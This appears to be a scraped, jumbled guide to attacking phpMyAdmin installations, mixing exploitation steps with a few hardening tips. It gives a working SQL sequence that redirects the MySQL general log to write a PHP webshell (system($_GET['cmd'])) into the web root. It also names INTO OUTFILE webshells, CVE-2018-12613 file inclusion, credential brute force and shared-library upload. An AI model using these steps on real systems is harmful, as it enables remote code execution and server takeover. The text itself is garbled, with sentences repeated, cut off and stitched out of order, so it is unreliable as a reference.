If the database user has FILE privilege and secure_file_priv is empty, write a webshell:
Works even when into outfile is disabled.
Users must provide a username and password. These modes are safer but still vulnerable to brute-force attacks if rate limiting is not enforced at the web server layer. 3. Exploiting Known Vulnerabilities (CVEs) phpmyadmin hacktricks verified
From phpMyAdmin SQL tab:
Change the default /phpmyadmin URL to a non-obvious name. Summary Table of Verified Attacks Brute Force Credentials Metasploit, Burp CVE-2018-12613 LFI manipulation INTO OUTFILE MySQL File Privilege Log Manipulation General Log exploitation If the database user has FILE privilege and
Affecting versions under 5.0.2, a SQL injection flaw exists in the user privileges page. An authenticated attacker can exploit this to escalate privileges or manipulate system files under specific environments. 5. Defensive Countermeasures and Hardening
If INTO OUTFILE fails, Hijack the MySQL General Log. An authenticated attacker can exploit this to escalate
If you can upload a shared library (Linux only):
$cfg['Servers'][$i]['controluser'] = 'pma_user'; $cfg['Servers'][$i]['controlpass'] = 'secret';
SHOW VARIABLES LIKE 'general_log_file'; SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/shell.php'; SELECT "<?php system($_GET['cmd']); ?>"; SET GLOBAL general_log = 'OFF';
Check for /README , /ChangeLog , or /Documentation.html at the root directory.